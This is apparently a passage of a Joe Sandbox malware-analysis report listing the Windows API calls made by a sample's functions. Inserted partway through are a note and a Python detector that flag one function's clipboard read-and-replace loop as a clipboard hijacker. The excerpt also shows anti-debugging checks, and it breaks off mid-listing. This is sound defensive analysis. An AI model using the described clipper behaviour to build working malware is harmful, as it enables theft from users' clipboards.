                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004103E7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throw
                                                                                    • String ID:
                                                                                    • API String ID: 2005118841-0
                                                                                    • Opcode ID: d3dc0e7b799cf4addcb5e854e1870d6270b50bfba89a80199028074021f20c37
                                                                                    • Instruction ID: f0ff8e4b9f7cc01ea46f57855d09a1922a3c0907516a33a9cf8cca3f22e82038
                                                                                    • Opcode Fuzzy Hash: d3dc0e7b799cf4addcb5e854e1870d6270b50bfba89a80199028074021f20c37
                                                                                    • Instruction Fuzzy Hash: E8E02B3050030D76CB107A65FC1195E33381A00328F90413BBC24A14D1EF78F99D858D
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(00000000,00000000,?,0043D105,?,?,00000000,?,0043D105,00000000,0000000C), ref: 0043CD47
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                    • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                                                    • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                    • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 007F9F5E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174565055.00000000007F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 007F9000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7f9000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                    • Instruction ID: 1f2a496c7f09bad51c6f8feb3860f414b141df697e465d2a09ffcb8527491044
                                                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                    • Instruction Fuzzy Hash: 3A112B79A00208EFDB01DF98C989E98BBF5AF08350F058094FA489B362D375EA50DB80
                                                                                    APIs
                                                                                    • __EH_prolog3_GS.LIBCMT ref: 009E1951
                                                                                    • Sleep.KERNEL32(000011EB), ref: 009E195B
                                                                                      • Part of subcall function 009ECE9C: _strlen.LIBCMT ref: 009ECEB3
                                                                                    • OpenClipboard.USER32(00000000), ref: 009E1988
                                                                                    • GetClipboardData.USER32(00000001), ref: 009E1998
                                                                                    • _strlen.LIBCMT ref: 009E19B4
                                                                                    • _strlen.LIBCMT ref: 009E19E3
                                                                                    • _strlen.LIBCMT ref: 009E1B27
                                                                                    • EmptyClipboard.USER32 ref: 009E1B3D
                                                                                    • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009E1B4A
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 009E1B74
                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 009E1B7D
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 009E1B84
                                                                                    • CloseClipboard.USER32 ref: 009E1BA8
                                                                                    • Sleep.KERNEL32(000002C7), ref: 009E1BB3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                    • String ID: 4#E$i
                                                                                    • API String ID: 4246938166-2480119546
                                                                                    • Opcode ID: 5a18581ab405ad27caf1df7c8ac30ba184fa26a46bc7722f265aab5c590d64ee
                                                                                    • Instruction ID: bc60d0e9da0fcd23b58369616d09205ac37d3602d09fcc21d8453abe8d39a73d
                                                                                    • Opcode Fuzzy Hash: 5a18581ab405ad27caf1df7c8ac30ba184fa26a46bc7722f265aab5c590d64ee
                                                                                    • Instruction Fuzzy Hash: B551F230D003859AD312DBA4ED067FD7768FF6A306F045229E841A6163EBB09E85C769
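The call order in the listing above, Sleep, OpenClipboard, GetClipboardData(00000001 = CF_TEXT), three _strlen calls, EmptyClipboard, GlobalAlloc, SetClipboardData(CF_TEXT), CloseClipboard, Sleep, is the read-then-overwrite loop of a clipboard hijacker: the text on the clipboard is fetched, measured, replaced and the function sleeps before the next pass (0x11EB = 4587 ms and 0x2C7 = 711 ms). The Python below is an added example, not Joe Sandbox code and not from the sample: it parses the "APIs" listing format used on this page into per-function call lists and flags that sequence. The line grammar is inferred from the listing itself, the CF_TEXT/CF_UNICODETEXT names come from the Win32 constants, and the sample input is the clipboard listing above plus the IsDebuggerPresent listing further down, copied from this report as a negative case.

```python
"""Parse Joe Sandbox per-function "APIs" listings and flag the clipboard
read-modify-write sequence. Added example for this page; the listing grammar
it assumes is inferred from the report text, not from a documented format."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# One API line, e.g. "• GetClipboardData.USER32(00000001), ref: 009E1998",
# "• _strlen.LIBCMT ref: 009E19B4" (no argument list), or a callee's call
# "• Part of subcall function 009ECE9C: _strlen.LIBCMT ref: 009ECEB3".
API_LINE = re.compile(
    r"^(?:• Part of subcall function (?P<subfn>[0-9A-F]{8}): )?•?\s*"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$"
)
# Metadata bullets such as "• API ID: ..." or "• Source File: ...".
META_LINE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
HEX32 = re.compile(r"[0-9A-F]{8}")


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str] = None  # callee address for "Part of subcall function" lines


@dataclass
class Function:
    calls: List[Call] = field(default_factory=list)
    meta: Dict[str, str] = field(default_factory=dict)


def parse_listing(text: str) -> List[Function]:
    """Split the text at each "APIs" header; collect that function's calls and metadata."""
    functions: List[Function] = []
    current: Optional[Function] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = Function()
            functions.append(current)
            continue
        if current is None or not line:
            continue
        m = API_LINE.match(line)
        if m:
            args = [] if m.group("args") is None else [a.strip() for a in m.group("args").split(",")]
            current.calls.append(Call(m.group("api"), m.group("module"), args, m.group("ref"), m.group("subfn")))
            continue
        m = META_LINE.match(line)
        if m:
            current.meta[m.group("key")] = m.group("val")
    return functions


# Read, clear, overwrite: the order a clipper performs the Win32 calls in.
CLIPPER_SEQUENCE = ("OpenClipboard", "GetClipboardData", "EmptyClipboard", "SetClipboardData", "CloseClipboard")
CLIPBOARD_FORMATS = {"00000001": "CF_TEXT", "0000000D": "CF_UNICODETEXT"}  # Win32 constants


def contains_in_order(names, pattern) -> bool:
    """True if every element of pattern occurs in names in that relative order (gaps allowed)."""
    it = iter(names)
    return all(any(n == p for n in it) for p in pattern)


def clipboard_findings(fn: Function) -> Optional[dict]:
    """Details when the function's own calls (callees excluded) follow CLIPPER_SEQUENCE, else None."""
    own = [c for c in fn.calls if c.subcall_of is None]
    if not contains_in_order([c.api for c in own], CLIPPER_SEQUENCE):
        return None
    fmt = next((c.args[0] for c in own if c.api == "GetClipboardData" and c.args), None)
    # Sleep arguments that are concrete hex values give the loop's pacing in milliseconds.
    sleeps = [int(c.args[0], 16) for c in own if c.api == "Sleep" and c.args and HEX32.fullmatch(c.args[0])]
    return {
        "format": CLIPBOARD_FORMATS.get(fmt, fmt),
        "sleep_ms": sleeps,  # non-empty means the body is paced like a polling loop
        "write_ref": next(c.ref for c in own if c.api == "SetClipboardData"),
    }


# Constructed input: two listings copied from this report (the clipboard function
# and a function that only touches IsDebuggerPresent and the exception filter).
SAMPLE_LISTING = """
APIs
• __EH_prolog3_GS.LIBCMT ref: 009E1951
• Sleep.KERNEL32(000011EB), ref: 009E195B
  • Part of subcall function 009ECE9C: _strlen.LIBCMT ref: 009ECEB3
• OpenClipboard.USER32(00000000), ref: 009E1988
• GetClipboardData.USER32(00000001), ref: 009E1998
• _strlen.LIBCMT ref: 009E19B4
• _strlen.LIBCMT ref: 009E19E3
• _strlen.LIBCMT ref: 009E1B27
• EmptyClipboard.USER32 ref: 009E1B3D
• GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009E1B4A
• GlobalUnlock.KERNEL32(00000000), ref: 009E1B74
• SetClipboardData.USER32(00000001,00000000), ref: 009E1B7D
• GlobalFree.KERNEL32(00000000), ref: 009E1B84
• CloseClipboard.USER32 ref: 009E1BA8
• Sleep.KERNEL32(000002C7), ref: 009E1BB3
Memory Dump Source
• Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
• API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4EB
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4F5
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A502
"""

if __name__ == "__main__":
    for i, fn in enumerate(parse_listing(SAMPLE_LISTING)):
        print(f"function {i}: {len(fn.calls)} calls, clipboard hijack: {clipboard_findings(fn)}")
```

Pointed at the saved text of a full report, the same parser yields every function's call list, so the sequence check can run across all of them; only the listing above should match, and the Sleep values it reports describe how often the sample re-reads the clipboard.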
                                                                                    APIs
                                                                                    • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 009E23B8
                                                                                    • GetClientRect.USER32(?,?), ref: 009E23CD
                                                                                    • GetDC.USER32(?), ref: 009E23D4
                                                                                    • CreateSolidBrush.GDI32(00646464), ref: 009E23E7
                                                                                    • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 009E2406
                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 009E2427
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009E2432
                                                                                    • MulDiv.KERNEL32(00000008,00000000), ref: 009E243B
                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 009E245F
                                                                                    • SetBkMode.GDI32(?,00000001), ref: 009E24EA
                                                                                    • _wcslen.LIBCMT ref: 009E2502
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 1529870607-0
                                                                                    • Opcode ID: be0766d7ae0c697a5dba668a9829c24405f9e4c1de05ebb10b7902c4c9583b03
                                                                                    • Instruction ID: d01aaa3541d0101d934262924fc01f64380dfe15797f62a950024aaed59df442
                                                                                    • Opcode Fuzzy Hash: be0766d7ae0c697a5dba668a9829c24405f9e4c1de05ebb10b7902c4c9583b03
                                                                                    • Instruction Fuzzy Hash: F171DC72900218AFDB229F64DD85FAEB7BCEB09751F0041A5F609E6155DA70AF80CF24
                                                                                    APIs
                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BAAD,?,00000000), ref: 0043B827
                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BAAD,?,00000000), ref: 0043B850
                                                                                    • GetACP.KERNEL32(?,?,0043BAAD,?,00000000), ref: 0043B865
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID: ACP$OCP
                                                                                    • API String ID: 2299586839-711371036
                                                                                    • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                    • Instruction ID: 27c07f44f4bcc92ed5b0bc77b7acbdc5106fd624739a874395cd08b17b137cf5
                                                                                    • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                    • Instruction Fuzzy Hash: 39210336A00104A6E738AF14C801B9773AAEF58F64F56942BEB0AD7310E736DE01C3D8
                                                                                    APIs
                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00A1BD14,?,00000000), ref: 00A1BA8E
                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00A1BD14,?,00000000), ref: 00A1BAB7
                                                                                    • GetACP.KERNEL32(?,?,00A1BD14,?,00000000), ref: 00A1BACC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID: ACP$OCP
                                                                                    • API String ID: 2299586839-711371036
                                                                                    • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                    • Instruction ID: 3ba3b810cc75335bd2d21baec8994d0a51e35c4589db703a6e6328875d0c3976
                                                                                    • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                    • Instruction Fuzzy Hash: B1217F32624205ABDB348F64D901AE773A6EF94FE0B5A8564E94AD7110F732DEC0C7B0
                                                                                    APIs
                                                                                      • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                      • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                      • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                      • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F59
                                                                                      • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F66
                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA6E
                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 0043BAC9
                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAD8
                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,004307D5,00000040,?,004308F5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB20
                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00430855,00000040), ref: 0043BB3F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                    • String ID:
                                                                                    • API String ID: 2287132625-0
                                                                                    • Opcode ID: a50431d0c3642f69d47dbab6daefb570278e327c2e745941eee8886a4e92d2d5
                                                                                    • Instruction ID: 67f71bbb56b82b0218cba6ea78e0e4499e3cf24bce0f2bcc9fbcefe2be7f4072
                                                                                    • Opcode Fuzzy Hash: a50431d0c3642f69d47dbab6daefb570278e327c2e745941eee8886a4e92d2d5
                                                                                    • Instruction Fuzzy Hash: DC517371D00609ABDB10EFA5CC45BBF77B8EF4C701F14556BEA40E7250EB789A048BA9
                                                                                    APIs
                                                                                      • Part of subcall function 00A12161: GetLastError.KERNEL32(?,?,00A0AA0C,?,00000000,?,00A0CE06,009E249A,00000000,?,00451F20), ref: 00A12165
                                                                                      • Part of subcall function 00A12161: _free.LIBCMT ref: 00A12198
                                                                                      • Part of subcall function 00A12161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A121D9
                                                                                      • Part of subcall function 00A12161: _free.LIBCMT ref: 00A121C0
                                                                                      • Part of subcall function 00A12161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A121CD
                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00A1BCD5
                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 00A1BD30
                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 00A1BD3F
                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,00A10A3C,00000040,?,00A10B5C,00000055,00000000,?,?,00000055,00000000), ref: 00A1BD87
                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00A10ABC,00000040), ref: 00A1BDA6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                    • String ID:
                                                                                    • API String ID: 2287132625-0
                                                                                    • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                    • Instruction ID: c9e36ecbf8b9d2b3f35dc1b517b5b84d54957e8df0c78c6c1f4f2c6ed822d0c3
                                                                                    • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                    • Instruction Fuzzy Hash: 78518F71A10209EBDB10DFA5DD41AFEB7B8BF08700F144569E905EB190EB719A84CBB1
                                                                                    APIs
                                                                                      • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                      • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                      • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307DC,?,?,?,?,00430233,?,00000004), ref: 0043B10C
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0043B19C
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0043B1AA
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307DC,00000000,004308FC), ref: 0043B24D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                    • String ID:
                                                                                    • API String ID: 2444527052-0
                                                                                    • Opcode ID: 235cd7c9c97d69f00393a381e4b6a272d6827e4b9def7e09cf33ed6baaba58e2
                                                                                    • Instruction ID: 5761a74378df300ed92098e1ccfc665780a6f2e5d92530a12aea1ed3de9efe0d
                                                                                    • Opcode Fuzzy Hash: 235cd7c9c97d69f00393a381e4b6a272d6827e4b9def7e09cf33ed6baaba58e2
                                                                                    • Instruction Fuzzy Hash: BF610C71600205AADB25AB35DC46BBB73A8EF0C744F14256FFA05DB281EB78DA40C7D9
                                                                                    APIs
                                                                                      • Part of subcall function 00A12161: GetLastError.KERNEL32(?,?,00A0AA0C,?,00000000,?,00A0CE06,009E249A,00000000,?,00451F20), ref: 00A12165
                                                                                      • Part of subcall function 00A12161: _free.LIBCMT ref: 00A12198
                                                                                      • Part of subcall function 00A12161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A121D9
                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00A10A43,?,?,?,?,00A1049A,?,00000004), ref: 00A1B373
                                                                                    • _wcschr.LIBVCRUNTIME ref: 00A1B403
                                                                                    • _wcschr.LIBVCRUNTIME ref: 00A1B411
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00A10A43,00000000,00A10B63), ref: 00A1B4B4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                    • String ID:
                                                                                    • API String ID: 2444527052-0
                                                                                    • Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                    • Instruction ID: 2ec99b1bce37c6f255ec13dbd7efe7dcc645d4323cc3533dbb25b24e5c9d86f8
                                                                                    • Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                    • Instruction Fuzzy Hash: A4610571610206AAD724EB75CD42BFB73ACEF04700F14802AF916DB582EB74E99187B1
                                                                                    APIs
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430233,?,00000004), ref: 00435233
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID: 11@$GetLocaleInfoEx
                                                                                    • API String ID: 2299586839-1075713910
                                                                                    • Opcode ID: 1dc130b9c5a187b3ffa5c8ddbc84a9ec177ca7c052edae5696fe3086fb7fd6c3
                                                                                    • Instruction ID: 0b6d0ab79e82c81e80324b5502c8e0aaa0a052425b201476cea76cb6f5b2798d
                                                                                    • Opcode Fuzzy Hash: 1dc130b9c5a187b3ffa5c8ddbc84a9ec177ca7c052edae5696fe3086fb7fd6c3
                                                                                    • Instruction Fuzzy Hash: 10F0BB31680318BBDB11AF51DC02F6F7B65EF19B12F10416BFC0566290DA759D20EA9E
                                                                                    APIs
                                                                                      • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                      • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                      • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                      • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F59
                                                                                      • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F66
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B469
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B4BA
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B57A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorInfoLastLocale$_free
                                                                                    • String ID:
                                                                                    • API String ID: 2834031935-0
                                                                                    • Opcode ID: 2b4fd7bd63b1ca4c86b7cdb97710403681583749ada0fe7a45d93d6fdc0ff965
                                                                                    • Instruction ID: c275762dc3584603e4449795e293da263c651eeb99c2a8a82852c084b1b0f28d
                                                                                    • Opcode Fuzzy Hash: 2b4fd7bd63b1ca4c86b7cdb97710403681583749ada0fe7a45d93d6fdc0ff965
                                                                                    • Instruction Fuzzy Hash: CA61B271900617AFDB289F25CC82BBA77A8EF18314F20517BEE05C6681E73DD951CB98
                                                                                    APIs
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4EB
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4F5
                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A502
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                    • String ID:
                                                                                    • API String ID: 3906539128-0
                                                                                    • Opcode ID: 3214526669c2ecc0a7e52ca6451879e06077fde6cd46758ec137b78cfee515f1
• Instruction ID: 9c884317c51d85a4b2a5569c8d07c46b6125cba9f3fa022ce0985413e040e42f
• Opcode Fuzzy Hash: 3214526669c2ecc0a7e52ca6451879e06077fde6cd46758ec137b78cfee515f1
• Instruction Fuzzy Hash: 6D31D474901228ABCB21DF24D8887DDBBB8BF08710F5041EAE81CA7251EB749F958F49
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,009EDAFC), ref: 00A0A752
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,009EDAFC), ref: 00A0A75C
• UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,009EDAFC), ref: 00A0A769
Memory Dump Source
• Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
• Instruction ID: e4c0428d7635a68188f57da373b77a0e0346b724ad2cfa1193f0d45fb54f317b
• Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
• Instruction Fuzzy Hash: C831C47490131CABCB21DF64D98979CBBB8BF58710F5081EAE81CA7291E7709F858F45
APIs
• GetCurrentProcess.KERNEL32(00000003,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002,00000000,?,0042DFDF,00000003), ref: 0042FEA0
• TerminateProcess.KERNEL32(00000000,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002,00000000,?,0042DFDF,00000003), ref: 0042FEA7
• ExitProcess.KERNEL32 ref: 0042FEB9
Memory Dump Source
• Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
• Instruction ID: f37ed9c2097ef164d49cac6b9283d1ec131115afdbcb09f205e89e36e121774d
• Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
• Instruction Fuzzy Hash: BCE08C31100158AFCF126F50EE08A4A3B39FF46B56F810439F9068B236CB39EE42CB48
APIs
• GetCurrentProcess.KERNEL32(00000000,?,00A100BC,00000000,00457970,0000000C,00A10213,00000000,00000002,00000000), ref: 00A10107
• TerminateProcess.KERNEL32(00000000,?,00A100BC,00000000,00457970,0000000C,00A10213,00000000,00000002,00000000), ref: 00A1010E
